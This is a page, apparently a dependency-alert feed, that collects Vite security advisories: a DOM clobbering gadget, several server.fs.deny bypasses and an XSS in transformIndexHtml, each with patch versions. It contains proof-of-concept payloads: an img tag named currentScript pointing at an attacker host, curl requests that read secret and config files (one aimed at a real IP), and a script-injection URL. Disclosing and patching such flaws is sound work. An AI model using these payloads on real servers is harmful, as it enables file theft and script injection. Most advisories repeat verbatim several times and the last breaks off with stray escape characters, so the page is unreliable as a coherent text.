DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Vite

We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to cjs, iife, or umd. In such cases, Vite replaces relative paths starting with __VITE_ASSET__ using the URL retrieved from document.currentScript.

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

const relativeUrlMechanisms = {
  amd: (relativePath) => {
    if (relativePath[0] !== ".") relativePath = "./" + relativePath;
    return getResolveUrl(
      `require.toUrl('${escapeId(relativePath)}'), document.baseURI`
    );
  },
  cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath)})`,
  es: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`
  ),
  iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
  // NOTE: make sure rollup generate `module` params
  system: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`
  ),
  umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath, true)})`
};

PoC

Considering a website that contains the following main.js script, the devloper decides to use the Vite to bundle up the program with the following configuration.

// main.js
import extraURL from './extra.js?url'
var s = document.createElement('script')
s.src = extraURL
document.head.append(s)

// extra.js
export default "https://myserver/justAnOther.js"

// vite.config.js
import { defineConfig } from 'vite'

export default defineConfig({
  build: {
    assetsInlineLimit: 0, // To avoid inline assets for PoC
    rollupOptions: {
      output: {
        format: "cjs"
      },
    },
  },
  base: "./",
});

After running the build command, the developer will get following bundle as the output.

// dist/index-DDmIg9VD.js
"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);

Adding the Vite bundled script, dist/index-DDmIg9VD.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>Vite Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of cjs, iife, or umd) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
  getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', ${
      umd ? `typeof document === 'undefined' ? location.href : ` : ''
    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,
  )

🚨 Vite's `server.fs.deny` is bypassed when using `?import&raw`

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

🚨 Vite's `server.fs.deny` is bypassed when using `?import&raw`

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

🚨 Vite's `server.fs.deny` is bypassed when using `?import&raw`

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

🚨 Vite's `server.fs.deny` is bypassed when using `?import&raw`

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

🚨 Vite's `server.fs.deny` did not deny requests for patterns with directories.

Summary

Vite dev server option server.fs.deny did not deny requests for patterns with directories. An example of such a pattern is /foo/**/*.

Impact

Only apps setting a custom server.fs.deny that includes a pattern with directories, and explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Patches

Fixed in vite@5.2.6, vite@5.1.7, vite@5.0.13, vite@4.5.3, vite@3.2.10, vite@2.9.18

Details

server.fs.deny uses picomatch with the config of { matchBase: true }. matchBase only matches the basename of the file, not the path due to a bug (micromatch/picomatch#89). The vite config docs read like you should be able to set fs.deny to glob with picomatch. Vite also does not set { dot: true } and that causes dotfiles not to be denied unless they are explicitly defined.

Reproduction

Set fs.deny to ['**/.git/**'] and then curl for /.git/config.

  • with matchBase: true, you can get any file under .git/ (config, HEAD, etc).
  • with matchBase: false, you cannot get any file under .git/ (config, HEAD, etc).

🚨 Vite's `server.fs.deny` did not deny requests for patterns with directories.

Summary

Vite dev server option server.fs.deny did not deny requests for patterns with directories. An example of such a pattern is /foo/**/*.

Impact

Only apps setting a custom server.fs.deny that includes a pattern with directories, and explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Patches

Fixed in vite@5.2.6, vite@5.1.7, vite@5.0.13, vite@4.5.3, vite@3.2.10, vite@2.9.18

Details

server.fs.deny uses picomatch with the config of { matchBase: true }. matchBase only matches the basename of the file, not the path due to a bug (micromatch/picomatch#89). The vite config docs read like you should be able to set fs.deny to glob with picomatch. Vite also does not set { dot: true } and that causes dotfiles not to be denied unless they are explicitly defined.

Reproduction

Set fs.deny to ['**/.git/**'] and then curl for /.git/config.

  • with matchBase: true, you can get any file under .git/ (config, HEAD, etc).
  • with matchBase: false, you cannot get any file under .git/ (config, HEAD, etc).

🚨 Vite's `server.fs.deny` did not deny requests for patterns with directories.

Summary

Vite dev server option server.fs.deny did not deny requests for patterns with directories. An example of such a pattern is /foo/**/*.

Impact

Only apps setting a custom server.fs.deny that includes a pattern with directories, and explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Patches

Fixed in vite@5.2.6, vite@5.1.7, vite@5.0.13, vite@4.5.3, vite@3.2.10, vite@2.9.18

Details

server.fs.deny uses picomatch with the config of { matchBase: true }. matchBase only matches the basename of the file, not the path due to a bug (micromatch/picomatch#89). The vite config docs read like you should be able to set fs.deny to glob with picomatch. Vite also does not set { dot: true } and that causes dotfiles not to be denied unless they are explicitly defined.

Reproduction

Set fs.deny to ['**/.git/**'] and then curl for /.git/config.

  • with matchBase: true, you can get any file under .git/ (config, HEAD, etc).
  • with matchBase: false, you cannot get any file under .git/ (config, HEAD, etc).

🚨 Vite's `server.fs.deny` did not deny requests for patterns with directories.

Summary

Vite dev server option server.fs.deny did not deny requests for patterns with directories. An example of such a pattern is /foo/**/*.

Impact

Only apps setting a custom server.fs.deny that includes a pattern with directories, and explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Patches

Fixed in vite@5.2.6, vite@5.1.7, vite@5.0.13, vite@4.5.3, vite@3.2.10, vite@2.9.18

Details

server.fs.deny uses picomatch with the config of { matchBase: true }. matchBase only matches the basename of the file, not the path due to a bug (micromatch/picomatch#89). The vite config docs read like you should be able to set fs.deny to glob with picomatch. Vite also does not set { dot: true } and that causes dotfiles not to be denied unless they are explicitly defined.

Reproduction

Set fs.deny to ['**/.git/**'] and then curl for /.git/config.

  • with matchBase: true, you can get any file under .git/ (config, HEAD, etc).
  • with matchBase: false, you cannot get any file under .git/ (config, HEAD, etc).

🚨 Vite's `server.fs.deny` did not deny requests for patterns with directories.

Summary

Vite dev server option server.fs.deny did not deny requests for patterns with directories. An example of such a pattern is /foo/**/*.

Impact

Only apps setting a custom server.fs.deny that includes a pattern with directories, and explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Patches

Fixed in vite@5.2.6, vite@5.1.7, vite@5.0.13, vite@4.5.3, vite@3.2.10, vite@2.9.18

Details

server.fs.deny uses picomatch with the config of { matchBase: true }. matchBase only matches the basename of the file, not the path due to a bug (micromatch/picomatch#89). The vite config docs read like you should be able to set fs.deny to glob with picomatch. Vite also does not set { dot: true } and that causes dotfiles not to be denied unless they are explicitly defined.

Reproduction

Set fs.deny to ['**/.git/**'] and then curl for /.git/config.

  • with matchBase: true, you can get any file under .git/ (config, HEAD, etc).
  • with matchBase: false, you cannot get any file under .git/ (config, HEAD, etc).

🚨 Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem

Summary

Vite dev server option server.fs.deny can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows.

This bypass is similar to https://nvd.nist.gov/vuln/detail/CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems.

Patches

Fixed in vite@5.0.12, vite@4.5.2, vite@3.2.8, vite@2.9.17

Details

Since picomatch defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible.

See picomatch usage, where nocase is defaulted to false: https://github.com/vitejs/vite/blob/v5.1.0-beta.1/packages/vite/src/node/server/index.ts#L632

By requesting raw filesystem paths using augmented casing, the matcher derived from config.server.fs.deny fails to block access to sensitive files.

PoC

Setup

  1. Created vanilla Vite project using npm create vite@latest on a Standard Azure hosted Windows 10 instance.
  2. Created dummy secret files, e.g. custom.secret and production.pem
  3. Populated vite.config.js with
export default { server: { fs: { deny: ['.env', '.env.*', '*.{crt,pem}', 'custom.secret'] } } }

Reproduction

  1. curl -s http://20.12.242.81:5173/@fs//
    • Descriptive error page reveals absolute filesystem path to project root
  2. curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/vite.config.js
    • Discoverable configuration file reveals locations of secrets
  3. curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/custom.sEcReT
    • Secrets are directly accessible using case-augmented version of filename

Proof
Screenshot 2024-01-19 022736

Impact

Who

  • Users with exposed dev servers on environments with case-insensitive filesystems

What

  • Files protected by server.fs.deny are both discoverable, and accessible

🚨 Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem

Summary

Vite dev server option server.fs.deny can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows.

This bypass is similar to https://nvd.nist.gov/vuln/detail/CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems.

Patches

Fixed in vite@5.0.12, vite@4.5.2, vite@3.2.8, vite@2.9.17

Details

Since picomatch defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible.

See picomatch usage, where nocase is defaulted to false: https://github.com/vitejs/vite/blob/v5.1.0-beta.1/packages/vite/src/node/server/index.ts#L632

By requesting raw filesystem paths using augmented casing, the matcher derived from config.server.fs.deny fails to block access to sensitive files.

PoC

Setup

  1. Created vanilla Vite project using npm create vite@latest on a Standard Azure hosted Windows 10 instance.
  2. Created dummy secret files, e.g. custom.secret and production.pem
  3. Populated vite.config.js with
export default { server: { fs: { deny: ['.env', '.env.*', '*.{crt,pem}', 'custom.secret'] } } }

Reproduction

  1. curl -s http://20.12.242.81:5173/@fs//
    • Descriptive error page reveals absolute filesystem path to project root
  2. curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/vite.config.js
    • Discoverable configuration file reveals locations of secrets
  3. curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/custom.sEcReT
    • Secrets are directly accessible using case-augmented version of filename

Proof
Screenshot 2024-01-19 022736

Impact

Who

  • Users with exposed dev servers on environments with case-insensitive filesystems

What

  • Files protected by server.fs.deny are both discoverable, and accessible

🚨 Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem

Summary

Vite dev server option server.fs.deny can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows.

This bypass is similar to https://nvd.nist.gov/vuln/detail/CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems.

Patches

Fixed in vite@5.0.12, vite@4.5.2, vite@3.2.8, vite@2.9.17

Details

Since picomatch defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible.

See picomatch usage, where nocase is defaulted to false: https://github.com/vitejs/vite/blob/v5.1.0-beta.1/packages/vite/src/node/server/index.ts#L632

By requesting raw filesystem paths using augmented casing, the matcher derived from config.server.fs.deny fails to block access to sensitive files.

PoC

Setup

  1. Created vanilla Vite project using npm create vite@latest on a Standard Azure hosted Windows 10 instance.
  2. Created dummy secret files, e.g. custom.secret and production.pem
  3. Populated vite.config.js with
export default { server: { fs: { deny: ['.env', '.env.*', '*.{crt,pem}', 'custom.secret'] } } }

Reproduction

  1. curl -s http://20.12.242.81:5173/@fs//
    • Descriptive error page reveals absolute filesystem path to project root
  2. curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/vite.config.js
    • Discoverable configuration file reveals locations of secrets
  3. curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/custom.sEcReT
    • Secrets are directly accessible using case-augmented version of filename

Proof
Screenshot 2024-01-19 022736

Impact

Who

  • Users with exposed dev servers on environments with case-insensitive filesystems

What

  • Files protected by server.fs.deny are both discoverable, and accessible

🚨 Vite XSS vulnerability in `server.transformIndexHtml` via URL payload

Summary

When Vite's HTML transformation is invoked manually via server.transformIndexHtml, the original request URL is passed in unmodified, and the html being transformed contains inline module scripts (<script type="module">...</script>), it is possible to inject arbitrary HTML into the transformed output by supplying a malicious URL query string to server.transformIndexHtml.

Impact

Only apps using appType: 'custom' and using the default Vite HTML middleware are affected. The HTML entry must also contain an inline script. The attack requires a user to click on a malicious URL while running the dev server. Restricted files aren't exposed to the attacker.

Patches

Fixed in vite@5.0.5, vite@4.5.1, vite@4.4.12

Details

Suppose index.html contains an inline module script:

<script type="module">
  // Inline script
</script>

This script is transformed into a proxy script like

<script type="module" src="/index.html?html-proxy&index=0.js"></script>

due to Vite's HTML plugin:

vite/packages/vite/src/node/plugins/html.ts

Lines 429 to 465 in 7fd7c6c

if (isModule) {
inlineModuleIndex++
if (url && !isExcludedUrl(url) && !isPublicFile) {
// <script type="module" src="..."/>
// add it as an import
js += `\nimport ${JSON.stringify(url)}`
shouldRemove = true
} else if (node.childNodes.length) {
const scriptNode =
node.childNodes.pop() as DefaultTreeAdapterMap['textNode']
const contents = scriptNode.value
// <script type="module">...</script>
const filePath = id.replace(normalizePath(config.root), '')
addToHTMLProxyCache(config, filePath, inlineModuleIndex, {
code: contents,
})
js += `\nimport "${id}?html-proxy&index=${inlineModuleIndex}.js"`
shouldRemove = true
}
everyScriptIsAsync &&= isAsync
someScriptsAreAsync ||= isAsync
someScriptsAreDefer ||= !isAsync
} else if (url && !isPublicFile) {
if (!isExcludedUrl(url)) {
config.logger.warn(
`<script src="${url}"> in "${publicPath}" can't be bundled without type="module" attribute`,
)
}
} else if (node.childNodes.length) {
const scriptNode =
node.childNodes.pop() as DefaultTreeAdapterMap['textNode']
scriptUrls.push(
...extractImportExpressionFromClassicScript(scriptNode),
)
}
}

When appType: 'spa' | 'mpa', Vite serves HTML itself, and htmlFallbackMiddleware rewrites req.url to the canonical path of index.html,

vite/packages/vite/src/node/server/middlewares/htmlFallback.ts

Lines 44 to 47 in 73ef074

if (fs.existsSync(filePath)) {
const newUrl = url + 'index.html'
debug?.(`Rewriting ${req.method} ${req.url} to ${newUrl}`)
req.url = newUrl

so the url passed to server.transformIndexHtml is /index.html.

However, if appType: 'custom', HTML is served manually, and if server.transformIndexHtml is called with the unmodified request URL (as the SSR docs suggest), then the path of the transformed html-proxy script varies with the request URL. For example, a request with path / produces

<script type="module" src="/@id/__x00__/index.html?html-proxy&index=0.js"></script>

It is possible to abuse this behavior by crafting a request URL to contain a malicious payload like

"></script><script>alert('boom')</script>

so a request to http://localhost:5173/?%22%3E%3C/script%3E%3Cscript%3Ealert(%27boom%27)%3C/script%3E produces HTML output like

<script type="module" src="/@id/__x00__/?"></script><script>alert("boom")</script>?html-proxy&index=0.js"></script>

which demonstrates XSS.

PoC

Detailed Impact

This will probably predominantly affect development-mode SSR, where vite.transformHtml is called using the original req.url, per the docs:

vite/docs/guide/ssr.md

Lines 114 to 126 in 7fd7c6c

const url = req.originalUrl
try {
// 1. Read index.html
let template = fs.readFileSync(
path.resolve(__dirname, 'index.html'),
'utf-8',
)
// 2. Apply Vite HTML transforms. This injects the Vite HMR client,
// and also applies HTML transforms from Vite plugins, e.g. global
// preambles from @vitejs/plugin-react
template = await vite.transformIndexHtml(url, template)

However, since this vulnerability affects server.transformIndexHtml, the scope of impact may be higher to also include other ad-hoc calls to server.transformIndexHtml from outside of Vite's own codebase.

My best guess at bisecting which versions are vulnerable involves the following test script

import fs from 'node:fs/promises';
import * as vite from 'vite';

const html = `
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
  </head>
  <body>
    <script type="module">
      // Inline script
    </script>
  </body>
</html>
`;
const server = await vite.createServer({ appType: 'custom' });
const transformed = await server.transformIndexHtml('/?%22%3E%3C/script%3E%3Cscript%3Ealert(%27boom%27)%3C/script%3E', html);
console.log(transformed);
await server.close();

and using it I was able to narrow down to #13581. If this is correct, then vulnerable Vite versions are 4.4.0-beta.2 and higher (which includes 4.4.0).

🚨 Vite XSS vulnerability in `server.transformIndexHtml` via URL payload

Summary

When Vite's HTML transformation is invoked manually via server.transformIndexHtml, the original request URL is passed in unmodified, and the html being transformed contains inline module scripts (<script type="module">...</script>), it is possible to inject arbitrary HTML into the transformed output by supplying a malicious URL query string to server.transformIndexHtml.

Impact

Only apps using appType: 'custom' and using the default Vite HTML middleware are affected. The HTML entry must also contain an inline script. The attack requires a user to click on a malicious URL while running the dev server. Restricted files aren't exposed to the attacker.

Patches

Fixed in vite@5.0.5, vite@4.5.1, vite@4.4.12

Details

Suppose index.html contains an inline module script:

<script type="module">
  // Inline script
</script>

This script is transformed into a proxy script like

<script type="module" src="/index.html?html-proxy&index=0.js"></script>

due to Vite's HTML plugin:

vite/packages/vite/src/node/plugins/html.ts

Lines 429 to 465 in 7fd7c6c

if (isModule) {
inlineModuleIndex++
if (url && !isExcludedUrl(url) && !isPublicFile) {
// <script type="module" src="..."/>
// add it as an import
js += `\nimport ${JSON.stringify(url)}`
shouldRemove = true
} else if (node.childNodes.length) {
const scriptNode =
node.childNodes.pop() as DefaultTreeAdapterMap['textNode']
const contents = scriptNode.value
// <script type="module">...</script>
const filePath = id.replace(normalizePath(config.root), '')
addToHTMLProxyCache(config, filePath, inlineModuleIndex, {
code: contents,
})
js += `\nimport "${id}?html-proxy&index=${inlineModuleIndex}.js"`
shouldRemove = true
}
everyScriptIsAsync &&= isAsync
someScriptsAreAsync ||= isAsync
someScriptsAreDefer ||= !isAsync
} else if (url && !isPublicFile) {
if (!isExcludedUrl(url)) {
config.logger.warn(
`<script src="${url}"> in "${publicPath}" can't be bundled without type="module" attribute`,
)
}
} else if (node.childNodes.length) {
const scriptNode =
node.childNodes.pop() as DefaultTreeAdapterMap['textNode']
scriptUrls.push(
...extractImportExpressionFromClassicScript(scriptNode),
)
}
}

When appType: 'spa' | 'mpa', Vite serves HTML itself, and htmlFallbackMiddleware rewrites req.url to the canonical path of index.html,

vite/packages/vite/src/node/server/middlewares/htmlFallback.ts

Lines 44 to 47 in 73ef074

if (fs.existsSync(filePath)) {
const newUrl = url + 'index.html'
debug?.(`Rewriting ${req.method} ${req.url} to ${newUrl}`)
req.url = newUrl

so the url passed to server.transformIndexHtml is /index.html.

However, if appType: 'custom', HTML is served manually, and if server.transformIndexHtml is called with the unmodified request URL (as the SSR docs suggest), then the path of the transformed html-proxy script varies with the request URL. For example, a request with path / produces

<script type="module" src="/@id/__x00__/index.html?html-proxy&index=0.js"></script>

It is possible to abuse this behavior by crafting a request URL to contain a malicious payload like

"></script><script>alert('boom')</script>

so a request to http://localhost:5173/?%22%3E%3C/script%3E%3Cscript%3Ealert(%27boom%27)%3C/script%3E produces HTML output like

<script type="module" src="/@id/__x00__/?"></script><script>alert("boom")</script>?html-proxy&index=0.js"></script>

which demonstrates XSS.

PoC

Detailed Impact

This will probably predominantly affect development-mode SSR, where vite.transformHtml is called using the original req.url, per the docs:

vite/docs/guide/ssr.md

Lines 114 to 126 in 7fd7c6c

const url = req.originalUrl
try {
// 1. Read index.html
let template = fs.readFileSync(
path.resolve(__dirname, 'index.html'),
'utf-8',
)
// 2. Apply Vite HTML transforms. This injects the Vite HMR client,
// and also applies HTML transforms from Vite plugins, e.g. global
// preambles from @vitejs/plugin-react
template = await vite.transformIndexHtml(url, template)

However, since this vulnerability affects server.transformIndexHtml, the scope of impact may be higher to also include other ad-hoc calls to server.transformIndexHtml from outside of Vite's own codebase.

My best guess at bisecting which versions are vulnerable involves the following test script

import fs from 'node:fs/promises';
import * as vite from 'vite';

const html = `
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
  </head>
  <body>
    <script type="module">
      // Inline script
    </script>
  </body>
</html>
`;
const server = await vite.createServer({ appType: 'custom' });
const transformed = await server.transformIndexHtml('/?%22%3E%3C/script%3E%3Cscript%3Ealert(%27boom%27)%3C/script%3E', html);
console.log(transformed);
await server.close();

and using it I was able to narrow down to #13581. If this is correct, then vulnerable Vite versions are 4.4.0-beta.2 and higher (which includes 4.4.0).

🚨 Vite XSS vulnerability in `server.transformIndexHtml` via URL payload

Summary

When Vite's HTML transformation is invoked manually via server.transformIndexHtml, the original request URL is passed in unmodified, and the html being transformed contains inline module scripts (<script type="module">...</script>), it is possible to inject arbitrary HTML into the transformed output by supplying a malicious URL query string to server.transformIndexHtml.

Impact

Only apps using appType: 'custom' and using the default Vite HTML middleware are affected. The HTML entry must also contain an inline script. The attack requires a user to click on a malicious URL while running the dev server. Restricted files aren't exposed to the attacker.

Patches

Fixed in vite@5.0.5, vite@4.5.1, vite@4.4.12

Details

Suppose index.html contains an inline module script:

<script type="module">
  // Inline script
</script>

This script is transformed into a proxy script like

<script type="module" src="/index.html?html-proxy&index=0.js"></script>

due to Vite's HTML plugin:

vite/packages/vite/src/node/plugins/html.ts

Lines 429 to 465 in 7fd7c6c

if (isModule) {
inlineModuleIndex++
if (url && !isExcludedUrl(url) && !isPublicFile) {
// <script type="module" src="..."/>
// add it as an import
js += `\nimport ${JSON.stringify(url)}`
shouldRemove = true
} else if (node.childNodes.length) {
const scriptNode =
node.childNodes.pop() as DefaultTreeAdapterMap['textNode']
const contents = scriptNode.value
// <script type="module">...</script>
const filePath = id.replace(normalizePath(config.root), '')
addToHTMLProxyCache(config, filePath, inlineModuleIndex, {
code: contents,
})
js += `\nimport "${id}?html-proxy&index=${inlineModuleIndex}.js"`
shouldRemove = true
}
everyScriptIsAsync &&= isAsync
someScriptsAreAsync ||= isAsync
someScriptsAreDefer ||= !isAsync
} else if (url && !isPublicFile) {
if (!isExcludedUrl(url)) {
config.logger.warn(
`<script src="${url}"> in "${publicPath}" can't be bundled without type="module" attribute`,
)
}
} else if (node.childNodes.length) {
const scriptNode =
node.childNodes.pop() as DefaultTreeAdapterMap['textNode']
scriptUrls.push(
...extractImportExpressionFromClassicScript(scriptNode),
)
}
}

When appType: 'spa' | 'mpa', Vite serves HTML itself, and htmlFallbackMiddleware rewrites req.url to the canonical path of index.html,

vite/packages/vite/src/node/server/middlewares/htmlFallback.ts

Lines 44 to 47 in 73ef074

if (fs.existsSync(filePath)) {
const newUrl = url + 'index.html'
debug?.(`Rewriting ${req.method} ${req.url} to ${newUrl}`)
req.url = newUrl

so the url passed to server.transformIndexHtml is /index.html.

However, if appType: 'custom', HTML is served manually, and if server.transformIndexHtml is called with the unmodified request URL (as the SSR docs suggest), then the path of the transformed html-proxy script varies with the request URL. For example, a request with path / produces

<script type="module" src="/@id/__x00__/index.html?html-proxy&index=0.js"></script>

It is possible to abuse this behavior by crafting a request URL to contain a malicious payload like

"></script><script>alert('boom')</script>

so a request to http://localhost:5173/?%22%3E%3C/script%3E%3Cscript%3Ealert(%27boom%27)%3C/script%3E produces HTML output like

<script type="module" src="/@id/__x00__/?"></script><script>alert("boom")</script>?html-proxy&index=0.js"></script>

which demonstrates XSS.

PoC

Detailed Impact

This will probably predominantly affect development-mode SSR, where vite.transformHtml is called using the original req.url, per the docs:

vite/docs/guide/ssr.md

Lines 114 to 126 in 7fd7c6c

const url = req.originalUrl
try {
// 1. Read index.html
let template = fs.readFileSync(
path.resolve(__dirname, 'index.html'),
'utf-8',
)
// 2. Apply Vite HTML transforms. This injects the Vite HMR client,
// and also applies HTML transforms from Vite plugins, e.g. global
// preambles from @vitejs/plugin-react
template = await vite.transformIndexHtml(url, template)

However, since this vulnerability affects server.transformIndexHtml, the scope of impact may be higher to also include other ad-hoc calls to server.transformIndexHtml from outside of Vite's own codebase.

My best guess at bisecting which versions are vulnerable involves the following test script

import fs from 'node:fs/promises';
import * as vite from 'vite';

const html = `
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
  </head>
  <body>
    <script type="module">
      // Inline script
    </script>
  </body>
</html>
`;
const server = await vite.createServer({ appType: 'custom' });
const transformed = await server.transformIndexHtml('/?%22%3E%3C/script%3E%3Cscript%3Ealert(%27boom%27)%3C/script%3E', html);
console.log(transformed);
await server.close();

and using it I was able to narrow down to #13581. If this is correct, then vulnerable Vite versions are 4.4.0-beta.2 and higher (which includes 4.4.0).

🚨 Vite Server Options (server.fs.deny) can be bypassed using double forward-slash (//)

The issue involves a security vulnerability in Vite where the server options can be bypassed using a double forward slash (//). This vulnerability poses a potential security risk as it can allow unauthorized access to sensitive directories and files.

Steps to Fix. Update Vite: Ensure that you are using the latest version of Vite. Security issues like this are often fixed in newer releases.\n2. Secure the server configuration: In your vite.config.js file, review and update the server configuration options to restrict access to unauthorized requests or directories.

Impact

Only users explicitly exposing the Vite dev server to the network (using --host or the server.host config option) are affected and only files in the immediate Vite project root folder could be exposed.\n\n### Patches\nFixed in vite@4.3.9, vite@4.2.3, vite@4.1.5, vite@4.0.5 and in the latest minors of the previous two majors, vite@3.2.7 and vite@2.9.16.

Details

Vite serves the application with under the root-path of the project while running on the dev mode. By default, Vite uses the server option fs.deny to protect sensitive files. But using a simple double forward-slash, we can bypass this restriction. \n\n### PoC\n1. Create a new latest project of Vite using any package manager. (here I'm using react and vue templates and pnpm for testing)\n2. Serve the application on dev mode using pnpm run dev.\n3. Directly access the file via url using double forward-slash (//) (e.g: //.env, //.env.local)\n4. The server option fs.deny was successfully bypassed.

Proof Images: proof-1\nproof-2

🚨 Vite Server Options (server.fs.deny) can be bypassed using double forward-slash (//)

The issue involves a security vulnerability in Vite where the server options can be bypassed using a double forward slash (//). This vulnerability poses a potential security risk as it can allow unauthorized access to sensitive directories and files.

Steps to Fix. Update Vite: Ensure that you are using the latest version of Vite. Security issues like this are often fixed in newer releases.\n2. Secure the server configuration: In your vite.config.js file, review and update the server configuration options to restrict access to unauthorized requests or directories.

Impact

